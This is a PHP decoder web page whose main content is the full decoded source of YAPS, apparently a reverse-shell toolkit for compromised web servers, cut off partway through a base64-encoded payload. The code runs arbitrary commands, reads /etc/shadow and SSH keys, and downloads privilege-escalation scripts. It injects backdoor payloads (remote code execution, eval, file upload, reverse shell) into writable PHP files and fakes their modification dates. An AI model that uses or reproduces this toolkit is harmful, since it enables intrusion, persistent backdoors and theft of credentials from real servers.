Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto H2UGy; mWaAD: ini_set("\x64\145\146\x61\165\154\164\137\163\157\143\x6b\145\16..
Decoded Output download
<?php
goto H2UGy; mWaAD: ini_set("default_socket_timeout", pow(99, 6)); goto OLG_c; gCfG6: $color = true; goto p0Ngs; p0Ngs: $use_password = false; goto kemz6; iBvWV: function duplicate() { global $s, $ip, $port, $_SERVER; if (!isset($_SERVER["REQUEST_SCHEME"]) || !isset($_SERVER["HTTP_HOST"]) || !isset($_SERVER["REQUEST_URI"])) { fwrite($s, yellow("[-] ") . "Couldn't find YAPS URL. Did you run me via command line?
Please provide the correct YAPS URL (example.com/files/yaps.php): "); while ($yaps_url = fread($s, 256)) { if (get_request(preg_replace("/\xa/", '', $yaps_url . "?vrfy")) !== "baguvix") { return fwrite($s, red("[-] ") . "Couldn't validade YAPS URL. Is this the correct URL?\xa"); } break; } $curl_url = $yaps_url; } else { $curl_url = $_SERVER["REQUEST_SCHEME"] . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; echo $curl_url; } fwrite($s, cyan("[*] ") . "Choose a port to listen (default: {$port}): "); while ($new_port = fread($s, 32)) { $new_port = base64_encode($new_port) == "Cg==" ? $port : substr($new_port, 0, -1); $socket = array("x" => $ip . ":" . $new_port); fwrite($s, "Connecting to " . $ip . ":" . $new_port . "\xa"); $cmd = "wget -qO- --post-data="" . http_build_query($socket) . "" {$curl_url} > /dev/null"; if (isAvailable("popen") && isAvailable("pclose")) { pclose(popen($cmd . " &", "r")); } else { run_cmd("timeout --kill-after 0 1 " . $cmd); } return; } } goto rHlHg; kXDc2: ignore_user_abort(1); goto y1ZOn; Sjo8m: function random_name($name = '') { $charset = implode('', array_merge(range("A", "Z"), range("a", "z"), range(0, 9))); for ($i = 0; $i <= mt_rand(5, 6); $i++) { $name .= $charset[mt_rand(0, strlen($charset) - 1)]; } return $name; } goto CWqQu; gn8lq: $short_args = "u::h::s::"; goto EKCVq; hZBFi: $ip = "127.0.0.1"; goto xn2Of; CWqQu: function download($url, $saveTo) { $randomName = random_name(); $content = get_request($url); if (isAvailable("file_put_contents")) { if (file_put_contents($saveTo . "/" . $randomName, $content)) { return $randomName; } } if (isAvailable("fopen") && isAvailable("fwrite") && isAvailable("fclose")) { $fp = fopen($saveTo . "/" . $randomName, "w"); if (fwrite($fp, $content)) { fclose($fp); return $randomName; } } return false; } goto S9wqS; H2UGy: $version = "1.3.1"; goto KkL02; f9SPd: function cmd_not_found($cmd) { global $s, $commands; foreach ($commands as $valid_cmd) { similar_text($cmd, $valid_cmd, $percentage); if ($percentage > 70) { fwrite($s, yellow("[!] ") . "Command '!{$cmd}' not found. Did you mean '!" . $valid_cmd . "'?.\xa"); return; } } fwrite($s, yellow("[!] ") . "Command '!" . substr($c, 1, -1) . "' not found. Use !help.
"); return; } goto VcfR6; jTCyq: $silent = false; goto LrEcv; WYwps: function passwd() { global $s, $use_password; if ($use_password) { if (!check_password()) { fwrite($s, red("[-] ") . " Wrong password
"); return; } fwrite($s, green("[+] Password is enabled. ") . white("Choose an option:") . "\xa[1] Change password\xa[2] Disable password
[3] Cancel
> "); while ($data = fread($s, 8)) { switch (substr($data, 0, -1)) { case "1": fwrite($s, cyan("[*] ") . "Choose the new password: "); while ($data2 = fread($s, 1024)) { $newPass = substr($data2, 0, -1); change_password($newPass); return; } break; case "2": toggle_password(); return; break; default: fwrite($s, cyan("[*] ") . "Canceled.
"); return; break; } } } else { fwrite($s, yellow("[!] Password is disabled. ") . white("Choose an option:") . "
[1] Set a password\xa[2] Enable password
[3] Cancel
> "); while ($data = fread($s, 8)) { switch (substr($data, 0, -1)) { case "1": fwrite($s, cyan("[*] ") . "Choose the new password: "); while ($data2 = fread($s, 1024)) { $newPass = substr($data2, 0, -1); change_password($newPass); return; } break; case "2": toggle_password(); return; break; default: fwrite($s, cyan("[*] ") . "Canceled.\xa"); return; break; } } } } goto iBvWV; SqGTY: if ($auto_verify_update) { verify_update(); } goto nPG3i; S9wqS: function enum() { global $s, $resources; $downloadLinpeas = download($resources["linpeas"], "/tmp/"); $downloadLinenum = download($resources["linenum"], "/tmp"); if ($downloadLinpeas) { fwrite($s, green("[+]") . " Linpeas saved to /tmp/" . $downloadLinpeas . cyan("
[i] Changing permissions...
")); if (chmod("/tmp/" . $downloadLinpeas, 777)) { fwrite($s, green("[+]") . " Permissions changed! \xa[i] You can run it with " . yellow("sh /tmp/" . $downloadLinpeas . " | tee /tmp/linpeas.log\xa
")); } else { fwrite($s, yellow("[!]") . " Couldn't change permissions... \xa[i] File was saved in " . yellow("/tmp/" . $downloadLinpeas . "
\xa")); } } if ($downloadLinenum) { fwrite($s, green("[+] Linenum saved to /tmp/" . $downloadLinenum) . cyan("
[i] Changing permissions...\xa")); if (chmod("/tmp/" . $downloadLinenum, 777)) { fwrite($s, green("[+]") . " Permissions changed! \xa[i] You can run it with " . yellow("sh /tmp/" . $downloadLinenum . " | tee /tmp/linenum.log\xa")); } else { fwrite($s, yellow("[!]") . " Couldn't change permissions... \xa[i] File was saved in " . yellow("/tmp/" . $downloadLinenum . "
")); } } } goto r2M4e; uIseZ: function usage() { global $banner, $version; return $banner . "\xa" . yellow("Usage:") . white("
There are three ways you can start the connection:\xa") . green("1. Via command line in the compromised host;") . "
E.g: $ php yaps.php [options] [ip port|ip:port]\xa" . green("2. Making a POST request to the file with the parameter "x";") . "
E.g: $ curl -X POST -d "x=192.168.73.59:7359" hacked.com/uploads/yaps.php\xa" . green("3. Making a GET request without parameters (will connect to the hardcoded socket);") . "\xa E.g: $ curl hacked.com/uploads/yaps.php\xa" . yellow("Options:") . white("
-h, --help: Show this help
-s, --silent: Silent mode (does not display banner)
-u, --update: Check if YAPS is up to date
") . yellow("Examples (suppose your IP is 192.168.73.59):") . "
infected@host:~$ php yaps.php -s 192.168.73.59 4444
infected@host:~$ php yaps.php 192.168.73.59:8080\xayour@machine:~$ curl -X POST -d "x=192.168.73.59" hacked.com/uploads/yaps.php\xa"; } goto TWD7O; lGppC: function select_files() { global $s; $webdir = array("/var/www/", "/srv/", "/usr/local/apache2/", "/var/apache2/", "/var/www/nginx-default/"); $webfiles_arr = array(); foreach ($webdir as $dir) { try { $list = getFiles($dir); $webfiles_arr = array_merge($webfiles_arr, $list); } catch (Exception $e) { } } if (count($webfiles_arr) > 0) { fwrite($s, cyan("[*] ") . white("Found " . count($webfiles_arr) . " writable PHP files:
")); } for ($i = 0; $i < count($webfiles_arr); $i++) { fwrite($s, red("[{$i}] ") . $webfiles_arr[$i] . PHP_EOL); } fwrite($s, cyan("
[*] ") . white("Choose the files you want to infect.\xa Separate by comma (e.g:1,5,7,8) and/or by range (e.g:10-16).
Files: ")); while ($data2 = fread($s, 1024)) { $files = str_replace(" ", '', substr($data2, 0, -1)); $files = explode(",", $files); if (count($files) == 1 && $files[0] == '') { return; } $toInfect = array(); foreach ($files as $file) { if (preg_match("/^[0-9]+$/", $file)) { array_push($toInfect, $file); } if (preg_match("/^[0-9]+\-[0-9]+$/", $file)) { $range = explode("-", $file); if ((int) $range[0] < (int) $range[1]) { for ($i = (int) $range[0]; (int) $i <= $range[1]; $i++) { array_push($toInfect, $i); } } } } sort($toInfect, SORT_NUMERIC); choose_payload($webfiles_arr, array_unique($toInfect)); return; } } goto V18g8; LrEcv: if (isset($_GET["vrfy"])) { die("baguvix"); } goto mBQZf; gxovs: function getPHP() { global $s; $php = ''; fwrite($s, cyan("[*]") . " Write your PHP code (*without* PHP tags). To send and run it, use " . green("!php") . ". " . yellow("
[i] Note that this is NOT an interactive PHP shell. Max input: 4096 bytes.") . white("\xaphp> ")); while ($c = fread($s, 4096)) { if (substr($c, 0, -1) == "!php") { return $php; } if (substr($c, 0, -1) == "!cancel") { return 0; } fwrite($s, white("php> ")); $php .= $c; } return $php; } goto o75dl; TwUwH: if (isset($_POST["x"]) && strpos($_POST["x"], ":") !== false) { $skt = explode(":", $_POST["x"]); $ip = $skt[0]; $port = $skt[1]; } goto oxSzT; efuXl: function run_cmd($c) { $c = $c . " 2>&1
"; if (isAvailable("exec")) { $stdout = array(); exec($c, $stdout); $stdout = join(chr(10), $stdout) . chr(10); } else { if (isAvailable("shell_exec")) { $stdout = shell_exec($c); } else { if (isAvailable("popen")) { $fp = popen($c, "r"); $stdout = NULL; if (is_resource($fp)) { while (!feof($fp)) { $stdout .= fread($fp, 1024); } } @pclose($fp); } else { if (isAvailable("passthru")) { ob_start(); passthru($c); $stdout = ob_get_contents(); ob_end_clean(); } else { if (isAvailable("proc_open")) { $handle = proc_open($c, array(array("pipe", "r"), array("pipe", "w"), array("pipe", "w")), $pipes); $stdout = NULL; while (!feof($pipes[1])) { $stdout .= fread($pipes[1], 1024); } @proc_close($handle); } else { if (isAvailable("system")) { ob_start(); system($c); $stdout = ob_get_contents(); ob_end_clean(); } else { $stdout = 0; } } } } } } return $stdout; } goto FlzCk; CXh7h: $pass_hash = "f00945860424fa6148e329772c08e7d05d7fab6f69a4722b4c66c164acdb018ecc0cbc62060cc67e7ae962c65ab5967620622cc12206627229b94106b66db6b8"; goto JzPAK; ZqmNp: function check_password() { global $s, $pass_hash, $salt; fwrite($s, yellow("[i] ") . "This shell is protected.
Enter the password: "); while ($data = fread($s, 1024)) { $entered_pass = substr($data, 0, -1); return hash("sha512", $salt . hash("sha512", $entered_pass, false), false) == $pass_hash ? true : false; } } goto ssUNI; JzPAK: $auto_verify_update = false; goto jTCyq; y1ZOn: ini_set("max_execution_time", 0); goto mWaAD; OLG_c: $resources = array("linpeas" => "https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh", "linenum" => "https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "suggester" => "https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh", "verifyUpdateURL" => "https://raw.githubusercontent.com/Nickguitar/YAPS/main/version", "updateURL" => "https://raw.githubusercontent.com/Nickguitar/YAPS/main/yaps.php"); goto hZBFi; wu7kB: function sysinfo() { global $s; fwrite($s, green("\xa====================== Initial info ======================
\xa")); $info = cyan("[i] OS info:\xa") . run_cmd("lsb_release -a | grep -v 'No LSB'") . PHP_EOL; $info .= cyan("[i] Hostname: ") . run_cmd("hostname"); $info .= cyan("[i] Kernel: ") . run_cmd("uname -a"); $info .= cyan("[i] CPU: \xa") . run_cmd("cat /proc/cpuinfo | grep -i 'model name' | cut -d':' -f 2 | sed 's/^ *//g'"); $info .= cyan("[i] RAM: \xa") . run_cmd("cat /proc/meminfo | egrep -i '(memtotal|memfree)'"); $info .= cyan("[i] Sudo version: ") . run_cmd("sudo --version | grep 'Sudo version' | cut -d' ' -f 3"); $info .= cyan("[i] User/groups: ") . run_cmd("id") . PHP_EOL; $info .= cyan("[i] Active TTY: \xa") . run_cmd("w") . PHP_EOL; fwrite($s, $info); fwrite($s, green("====================== Users info ======================
\xa")); $info = cyan("[i] Current user: ") . run_cmd("whoami"); $info .= cyan("[i] Users in /home: \xa") . run_cmd("ls /home") . PHP_EOL; $info .= cyan("[i] Crontab of current user: \xa") . run_cmd("crontab -l | egrep -v '^#'") . PHP_EOL; $info .= cyan("[i] Crontab:
") . run_cmd("cat /etc/crontab | egrep -v '^#'") . PHP_EOL; fwrite($s, $info); fwrite($s, green("====================== All users ======================\xa\xa")); fwrite($s, run_cmd("cat /etc/passwd") . PHP_EOL); if (is_readable("/etc/shadow")) { fwrite($s, red("[!] /etc/shadow is readable!
") . run_cmd("cat /etc/shadow") . PHP_EOL); } fwrite($s, green("====================== Net info ======================\xa\xa")); $info = cyan("[i] IP Info:
") . run_cmd("ifconfig") . PHP_EOL; $info .= cyan("[i] Hosts:
") . run_cmd("cat /etc/hosts | grep -v '^#'") . PHP_EOL; $info .= cyan("[i] Interfaces/routes: \xa") . run_cmd("cat /etc/networks && route") . PHP_EOL; $info .= cyan("[i] IP Tables rules:
") . run_cmd("(iptables --list-rules 2>/dev/null)") . PHP_EOL; $info .= cyan("[i] Active ports: \xa") . run_cmd("(netstat -punta) 2>/dev/null") . PHP_EOL; fwrite($s, $info); fwrite($s, green("====================== Interesting binaries ======================
")); $interesting_binaries = array("nc", "nc.traditional", "ncat", "nmap", "perl", "python", "python2", "python2.6", "python2.7", "python3", "python3.6", "python3.7", "ruby", "node", "gcc", "g++", "docker", "php"); foreach ($interesting_binaries as $binary) { $binary = shell_exec("which {$binary} 2>/dev/null"); if ($binary !== '' && base64_encode($binary . PHP_EOL) !== "Cg==") { fwrite($s, run_cmd("ls -l {$binary}")); } } fwrite($s, green("
====================== SUID binaries ======================
\xa")); $suid_list = explode("
", shell_exec("find / -type f -perm /4000 2>/dev/null")); foreach ($suid_list as $suid) { if ($suid !== '') { fwrite($s, run_cmd("ls -l {$suid}")); } } fwrite($s, green("\xa====================== SSH files ======================\xa
")); $authorized_keys = explode("
", shell_exec("find / -type f -name authorized_keys 2>/dev/null")); foreach ($authorized_keys as $public_key) { if (is_writable($public_key)) { fwrite($s, red("[Writable] ") . $public_key . PHP_EOL); } else { fwrite($s, $public_key . PHP_EOL); } } $id_rsa = explode("
", shell_exec("find / -type f -name id_rsa 2>/dev/null")); foreach ($id_rsa as $priv_key) { if (is_readable($priv_key)) { fwrite($s, red("[Readable] ") . $priv_key . PHP_EOL); } else { fwrite($s, $priv_key . PHP_EOL); } } fwrite($s, green("
=================== Writable PHP files ===================\xa
")); $webfiles_arr = array(); $webdir = array("/var/www", "/srv", "/usr/local/apache2", "/var/apache2", "/var/www/nginx-default"); foreach ($webdir as $dir) { $webfiles_arr = array_merge($webfiles_arr, explode("
", shell_exec("find " . $dir . " -type f -name '*.php*' -writable 2>/dev/null"))); } if (count($webfiles_arr) > 25) { for ($i = 0; $i < 25; $i++) { if ($webfiles_arr[$i] !== '') { fwrite($s, red("[Writable] ") . $webfiles_arr[$i] . PHP_EOL); } } fwrite($s, "...
..." . PHP_EOL); fwrite($s, green("[+] ") . "Showing only the first 25 files. There are more!" . PHP_EOL); } else { foreach ($webfiles_arr as $file) { if ($file !== '') { fwrite($s, red("[Writable] ") . $file . PHP_EOL); } } } fwrite($s, cyan("
[i]") . " Get more information with !enum." . PHP_EOL); } goto Sjo8m; KkL02: set_time_limit(0); goto kXDc2; QBC7U: $commands = array("all-colors", "color", "duplicate", "enum", "help", "infect", "info", "passwd", "php", "stabilize", "suggester"); goto UVSoS; Wuvgt: function refresh_ps1($changecolor = false) { global $ps1_color, $ps1; $user = str_replace(PHP_EOL, '', run_cmd("whoami")); if (!$ps1_color) { $ps1 = white("[YAPS] ") . str_replace(PHP_EOL, '', green($user . "@" . run_cmd("hostname")) . ":" . cyan(run_cmd("pwd")) . "$ "); if ($user == "root") { $ps1 = white("[YAPS] ") . str_replace(PHP_EOL, '', red($user . "@" . run_cmd("hostname")) . ":" . cyan(run_cmd("pwd")) . "# "); } if ($changecolor) { $ps1_color = true; } } else { $ps1 = white("[YAPS] ") . str_replace(PHP_EOL, '', $user . "@" . run_cmd("hostname") . ":" . run_cmd("pwd") . "$ "); if ($user == "root") { $ps1 = white("[YAPS] ") . str_replace(PHP_EOL, '', $user . "@" . run_cmd("hostname") . ":" . run_cmd("pwd") . "# "); } if ($changecolor) { $ps1_color = false; } } } goto gxovs; vng9E: function infect($allFiles, $fileArr, $payload_index, $payload_list, $position = 1) { global $s; $payload = $payload_list[array_keys($payload_list)[$payload_index]]; fwrite($s, yellow("\xa[!] ") . white("Files to infect:
")); foreach ($fileArr as $fileToInfect) { fwrite($s, $allFiles[$fileToInfect] . "
"); } fwrite($s, yellow("[!] ") . white("Payload: ") . $payload_list[array_keys($payload_list)[$payload_index]] . "\xa"); $position_str = $position ? "End of file" : "Beginnig of file"; fwrite($s, yellow("[!] ") . white("Position: ") . $position_str . "
"); fwrite($s, cyan("[?] ") . white("Are you sure you want to infect those files? [Y/n]")); while ($sure = fread($s, 128)) { if (strtolower(substr($sure, 0, 1)) == "n") { return; } break; } foreach ($fileArr as $fileToInfect) { $filePath = $allFiles[$fileToInfect]; if (isAvailable("file_get_contents") && isAvailable("file_put_contents")) { $old = file_get_contents($filePath); $originalDate = str_replace("
", '', run_cmd("stat " . $filePath . " | grep Modify | sed "s/Modify: //"")); if ($position) { $written = file_put_contents($filePath, "\xa" . $payload, FILE_APPEND) ? 1 : 0; } else { $written = file_put_contents($filePath, $payload . "\xa" . $old) ? 1 : 0; } $result = $written ? green("[+] ") . white($filePath . " was infected with payload !") : red("[-] ") . white($filePath . " Error!"); fwrite($s, $result . "\xa"); if (run_cmd("touch -d " . """ . $originalDate . "" " . $filePath)) { fwrite($s, green("[+] ") . white("Mantained original 'modified date' (" . $originalDate . ").
")); } } } return; } goto idP0M; EKCVq: $long_args = array("update::", "help::", "silent::"); goto iyx8E; kemz6: $salt = "v_3_r_Y___G_o_0_d___s_4_L_t"; goto CXh7h; o75dl: function runPHP($code) { try { ob_start(); eval($code); $result = ob_get_contents(); ob_end_clean(); } catch (Throwable $ex) { $err = explode("Stack trace:", $ex); $result = $err[0]; } return $result; } goto Wym75; jsOgp: function getFiles($dir) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir)); $list = array(); foreach ($iterator as $file) { if (!is_dir($file) && is_writable($file)) { if ($file->getPathName() !== $_SERVER["SCRIPT_FILENAME"]) { if (substr($file->getPathName(), -4) == ".php") { array_push($list, $file->getPathName()); } } } } sort($list); return $list; } goto lGppC; sfKGX: function toggle_password() { global $use_password, $s, $yaps; $yaps_code = file_get_contents($yaps); if ($use_password) { $new_yaps_code = preg_replace("/(\$use_password += +)(true)/", "$1false", $yaps_code, 1); if (file_put_contents($yaps, $new_yaps_code)) { $use_password = false; fwrite($s, green("[+] ") . "Password deactivated.
"); return true; } fwrite($s, red("[-] ") . "Couldn't deactivate password.\xa"); return false; } $new_yaps_code = preg_replace("/(\$use_password += +)(false)/", "$1true", $yaps_code, 1); if (file_put_contents($yaps, $new_yaps_code)) { $use_password = false; fwrite($s, green("[+] ") . "Password activated.\xa"); return true; } fwrite($s, red("[-] ") . "Couldn't activate password.
"); return false; } goto WYwps; pGTWf: if (isset($options["u"]) || isset($options["update"])) { die(verify_update()); } goto MwOOd; rHlHg: function get_request($url) { $response = false; if (isAvailable("file_get_contents")) { $response = file_get_contents($url); } elseif (isAvailable("fread") && isAvailable("fopen") && ini_get("allow_url_fopen")) { $response = fread(fopen($url, "r"), 10); } elseif (in_array("curl", get_loaded_extensions())) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $response = curl_exec($ch); curl_close($ch); } elseif ($tmp_curl = run_cmd("curl -s " . $url)) { $response = $tmp_curl; } elseif ($tmp_wget = run_cmd("wget -qO- " . $url)) { $response = $tmp_wget; } return $response; } goto MIocV; zJ69L: if (php_sapi_name() == "cli") { if ($argc >= 2 && preg_match("/^[0-9]+$/", $argv[$argc - 1])) { $port = $argv[$argc - 1]; $ip = $argv[$argc - 2]; } else { foreach ($argv as $arg) { if (strpos($arg, ":") !== false) { $socket = explode(":", $arg); $ip = $socket[0]; $port = (int) $socket[1]; } } } } goto QBC7U; UVSoS: function green($str) { global $color; return $color ? "\33[92m" . $str . "\x1b[0m" : $str; } goto uFC47; idP0M: function parse_stdin($input) { global $s, $color; switch (substr($input, 0, -1)) { case "!all-colors": $color = !$color; break; case "!info": return sysinfo(); break; case "!enum": return enum(); break; case "!suggester": return suggester(); break; case "!color": refresh_ps1(true); break; case "!help": return help(); break; case "!php": $phpCode = getPHP(); if ($phpCode !== 0) { $result = runPHP($phpCode); fwrite($s, $result); } else { fwrite($s, yellow("[i] Code canceled.") . PHP_EOL); } break; case "!stabilize": stabilize(); break; case "!backdoor": backdoor(); break; case "!passwd": passwd(); break; case "!duplicate": duplicate(); break; case "!infect": select_files(); break; } } goto f9SPd; k28_t: if (isset($options["h"]) || isset($options["help"])) { die(usage()); } goto pGTWf; ssUNI: function change_password($new) { global $salt, $yaps, $s; $new_hash = hash("sha512", $salt . hash("sha512", $new, false), false); if (!is_readable($yaps) || !is_writable($yaps)) { return false; } $yaps_code = file_get_contents($yaps); $new_yaps_code = preg_replace("/[a-f0-9]{128}/", $new_hash, $yaps_code, 1); if (file_put_contents($yaps, $new_yaps_code)) { fwrite($s, green("[+] ") . "Password changed. Changes will take effect on next connection.\xa"); return true; } else { fwrite($s, red("[-] ") . "Couldn't read or write the file. Are the permissions right?\xa" . run_cmd("ls -l " . $yaps . "
")); return false; } } goto sfKGX; oxSzT: $banner = cyan("
o o O o--o o-o\xa \ / / \ | ) (\xa O o---o O--o o-o
| | | | )
o o o o o--o
Yet Another PHP Shell") . "\xa Version " . $version . "
Coder: Nicholas Ferreira"; goto gn8lq; mBQZf: $yaps = $_SERVER["SCRIPT_FILENAME"]; goto TwUwH; V18g8: function choose_payload($allFiles, $toInfect) { global $s; $payloads = array("0. TinyRCE\x9" => "<?=`$_REQUEST[0]`;?>", "1. ClassicRCE\x9" => "<?=@system($_REQUEST[0]);?>", "2. Eval\x9\x9" => "<?=@eval($_REQUEST[0]);?>", "3. BasedEval\x9" => "<?=@eval(base64_decode($_REQUEST[0]));?>", "4. RemotePHP " => "<?=@eval(file_get_contents($_REQUEST[0]));?>", "5. RemoteUpload\x9" => "<?=$x=rand(100,999);@file_put_contents("./".$x.".".$_REQUEST[1],@file_get_contents($_REQUEST[0]));echo $x.$_REQUEST[1];?>", "6. LocalUpload\x9" => "<?php if(isset($_FILES["0"]))if(move_uploaded_file($_FILES["0"]["tmp_name"],"_".$_FILES["0"]["name"]))echo"Uploaded: _".$_FILES["0"]["name"];?>", "7. StableShell\x9" => "<?php $a="script -qc /bin/bash /dev/null";umask(0);$b=fsockopen($_REQUEST[0],$_REQUEST[1],$c,$d,30);$e=array(0=>array("pipe","r"),1=>array("pipe","w"),2=>array("pipe","w"));$f=proc_open($a,$e,$g);foreach($g as $p)stream_set_blocking($p,0);stream_set_blocking($b,0);while(!feof($b)){$i=array($b,$g[1],$g[2]);if(in_array($b,$i))fwrite($g[0],fread($b,2048));if(in_array($g[1],$i))fwrite($b,fread($g[1],2048));if(in_array($g[2],$i))fwrite($b,fread($g[2],2048));}fclose($b);foreach($g as $p)fclose($p);proc_close($f);?>"); fwrite($s, cyan("
[i] ") . white("List of payloads available:
")); $i = true; foreach ($payloads as $name => $code) { $desc = $i ? cyan($name) . $code : cyan($name) . white($code); fwrite($s, $desc . "
"); $i = !$i; } fwrite($s, cyan("
[?] ") . white("Choose a payload to infect the selected files (default:0): ")); while ($choosed_payload = fread($s, 128)) { $user_payload = 0; if ((int) $choosed_payload <= count($payloads) + 1) { $user_payload = $choosed_payload; } break; } fwrite($s, cyan("[?] ") . white("Do you want do insert the payload at the beginning [0] or end [1] of the file (default: 1)? ")); while ($position = fread($s, 128)) { $position = 1; if ((int) $position === 0) { $position = 0; } break; } infect($allFiles, $toInfect, (int) $user_payload, $payloads, (int) $position); return; } goto vng9E; x3nOo: function white($str) { global $color; return $color ? "\x1b[97m" . $str . "\x1b[0m" : $str; } goto ixO3W; r2M4e: function suggester() { global $s, $resources; $download = download($resources["suggester"], "/tmp/"); if ($download) { fwrite($s, green("[+]") . " Linux Exploit Suggester saved to /tmp/" . $download . cyan("
[i]") . " Changing permissions...
"); if (chmod("/tmp/" . $download, 777)) { fwrite($s, green("[+]") . " Permissions changed!
[i] You can run it with " . yellow("sh /tmp/" . $download . " | tee /tmp/LES.log\xa")); } else { fwrite($s, yellow("[!]") . " Couldn't change permissions... \xa[i] File was saved in " . yellow("/tmp/" . $download . "\xa")); } } return; } goto Wuvgt; iWGdZ: function backdoor() { } goto ZqmNp; VcfR6: function connect() { global $use_password, $commands, $ps1, $s, $silent; refresh_ps1(1); if (!isAvailable("fsockopen")) { die(red("[-]") . " Function 'fsockopen' isn't available."); } if ($use_password) { if (!check_password()) { die(fwrite($s, red("[-]") . " Wrong password.
")); } } if (!isset($_REQUEST["silent"]) && !isset($_REQUEST["s"]) && !$silent) { fwrite($s, banner() . "
"); } refresh_ps1(); fwrite($s, "
" . $ps1); while ($c = fread($s, 2048)) { $out = ''; if (substr($c, 0, 1) == "!") { if (in_array(strtolower(substr($c, 1, -1)), $commands)) { $out = parse_stdin($c); } else { cmd_not_found(substr($c, 1, -1)); } } elseif (substr($c, 0, 3) == "cd ") { chdir(substr($c, 3, -1)); } elseif (substr($c, 0, -1) == "exit") { fwrite($s, yellow("[i] ") . "Closing connection.\xa"); fclose($s); die; } else { $out = run_cmd(substr($c, 0, -1)); } if ($out === false) { fwrite($s, red("[-] There are no exec functions")); break; } refresh_ps1(); fwrite($s, $out . $ps1); } fclose($s); } goto SqGTY; ixO3W: function banner() { global $banner; return $banner . white("\xa This is ") . red("NOT") . white(" an interactive shell.\xa Use ") . green("!help") . white(" to see commands."); } goto uIseZ; LavC2: function help() { $help = "
" . green("Useful commands:") . "
" . cyan("!help") . "
\x9Display this menu
" . cyan("!all-colors") . "\xa \x9Toggle all colors (locally only)\xa " . cyan("!color") . "\xa Toggle $PS1 color (locally only)
" . cyan("!duplicate") . "\xa \x9Spawn another reverse shell\xa " . cyan("!enum") . "\xa Download Linpeas and Linenum to /tmp and get it ready to run\xa " . cyan("!infect") . "
\x9Inject payloads into PHP files\xa " . cyan("!info") . "\xa List information about target
" . cyan("!passwd") . "\xa Show options for password
" . cyan("!php") . "\xa Write and run PHP code on the remote host\xa " . cyan("!stabilize") . "\xa Stabilize to an interactive shell
" . cyan("!suggester") . "
Download Linux Exploit Suggester to /tmp and get it ready to run
" . green("Command line options:") . "
" . white("$ php yaps.php [--update|-u]") . "
\x9Check if YAPS is up to date
" . white("$ php yaps.php ip port") . "
\x9Connect to ip:port\xa"; return $help; } goto efuXl; TWD7O: function isAvailable($function) { $dis = ini_get("disable_functions"); if (!empty($dis)) { $dis = preg_replace("/[, ]+/", ",", $dis); $dis = explode(",", $dis); $dis = array_map("trim", $dis); } else { $dis = array(); } if (is_callable($function) and !in_array($function, $dis)) { return true; } return false; } goto LavC2; uFC47: function red($str) { global $color; return $color ? "\x1b[91m" . $str . "\x1b[0m" : $str; } goto SQe5k; MIocV: function verify_update() { global $version, $resources; $newest_version = 0; echo cyan("[i] ") . "Your version: {$version}. Checking for updates...\xa"; $request = get_request($resources["verifyUpdateURL"]); if ($request) { $newest_version = $request; } $newest_version_ = (int) str_replace(".", '', $newest_version); $version_ = (int) str_replace(".", '', $version); if ($newest_version_ !== 0 && $newest_version_ > $version_) { echo red("[i]") . " Your version is not up to date.
" . green("[DOWNLOAD v" . str_replace("\xa", '', $newest_version) . "]: ") . $resources["updateURL"] . "\xa"; return; } echo green("[+] ") . "YAPS is already up to date (v{$version})!\xa"; return; } goto jsOgp; Wym75: function stabilize($post_socket = '') { global $s, $port, $ip; $payload = "JHNjcmlwdD1zaGVsbF9leGVjKCJ3aGljaCBzY3JpcHQiKTskcHkzPXNoZWxsX2V4ZWMoIndoaWNoIHB5dGhvbjMiKTskcHk9c2hlbGxfZXhlYygid2hpY2ggcHl0aG9uIik7aWYoc3RybGVuKCRzY3JpcHQpPjYgJiYgc3RycG9zKCRzY3JpcHQsIm5vdCBmb3VuZCIpPT1mYWxzZSkgJHN0YWJpbGl6ZXI9Ii9iaW4vYmFzaCAtY2kgJyIuJHNjcmlwdC4iIC1xYyAvYmluL2Jhc2ggL2Rldi9udWxsJyI7ZWxzZSBpZihzdHJsZW4oJHB5Myk+NyAmJiBzdHJwb3MoJHNjcmlwdCwibm90IGZvdW5kIik9PWZhbHNlKSAkc3RhYmlsaXplcj0kcHkzLiIgLWMgJ2ltcG9ydCBwdHk7cHR5LnNwYXduKFwiL2Jpbi9iYXNoXCIpJyI7ZWxzZSBpZihzdHJsZW4oJHB5KT42ICYmIHN0cnBvcygkc2NyaXB0LCJub3QgZm91bmQiKT09ZmFsc2UpICRzdGFiaWxpemVyPSRweS4iIC1jICdpbXBvcnQgcHR5O3B0eS5zcGF3bihcIi9iaW4vYmFzaFwiKSciO2Vsc2UgJHN0YWJpbGl6ZXI9Ii9iaW4vYmFzaCI7JHN0YWJpbGl6ZXI9c3RyX3JlcGxhY2UoIlxuIiwiIiwkc3RhYmlsaXplcik7JHNoZWxsPSJ1bmFtZSAtYTskc3RhYmlsaXplciI7dW1hc2soMCk7JHNvY2s9ZnNvY2tvcGVuKCJJUF9BRERSIixQT1JULCRlcnJubywkZXJyc3RyLDMwKTskc3RkPWFycmF5KCAwID0+IGFycmF5KCJwaXBlIiwiciIpLDEgPT4gYXJyYXkoInBpcGUiLCJ3IiksMiA9PiBhcnJheSgicGlwZSIsInciKSApOyRwcm9jZXNzPXByb2Nfb3Blbigkc2hlbGwsJHN0ZCwkcGlwZXMpO2ZvcmVhY2goJHBpcGVzIGFzICRwKSBzdHJlYW1fc2V0X2Jsb2NraW5nKCRwLDApO3N0cmVhbV9zZXRfYmxvY2tpbmcoJHNvY2ssMCk7d2hpbGUoIWZlb2YoJHNvY2spKXskcmVhZF9hPWFycmF5KCRzb2NrLCRwaXBlc1sxXSwkcGlwZXNbMl0pO2lmKGluX2FycmF5KCRzb2NrLCRyZWFkX2EpKSBmd3JpdGUoJHBpcGVzWzBdLGZyZWFkKCRzb2NrLDIwNDgpKTtpZihpbl9hcnJheSgkcGlwZXNbMV0sJHJlYWRfYSkpIGZ3cml0ZSgkc29jayxmcmVhZCgkcGlwZXNbMV0sMjA0OCkpO2lmKGluX2FycmF5KCRwaXBlc1syXSwkcmVhZF9hKSkgZndyaXRlKCRzb2NrLGZyZWFkKCRwaXBlc1syXSwyMDQ